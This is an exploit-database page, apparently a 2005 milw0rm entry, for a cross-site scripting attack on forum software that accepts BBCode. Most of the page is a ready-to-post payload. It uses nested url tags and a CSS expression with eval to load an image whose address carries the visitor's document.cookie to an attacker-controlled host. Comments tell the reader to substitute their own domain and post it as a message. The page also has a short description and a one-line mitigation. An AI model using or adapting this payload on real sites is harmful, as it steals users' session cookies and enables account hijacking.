header-logo
Suggest Exploit
vendor:
N/A
by:
Nick Griffin
7,5
CVSS
HIGH
Cross-site Scripting (XSS)
79
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

milw0rm.com

This exploit allows an attacker to inject malicious JavaScript code into a web page. The code is executed when a user visits the page. The malicious code can be used to steal cookies, hijack user sessions, redirect users to malicious sites, or perform other malicious activities.

Mitigation:

Input validation and output encoding can be used to prevent XSS attacks.
Source

Exploit-DB raw data:

/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.

Credits to Nick Griffin.

/str0ke
*/

[color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


# milw0rm.com [2005-07-14]

Navigation

Suggest Exploit

Services By CQR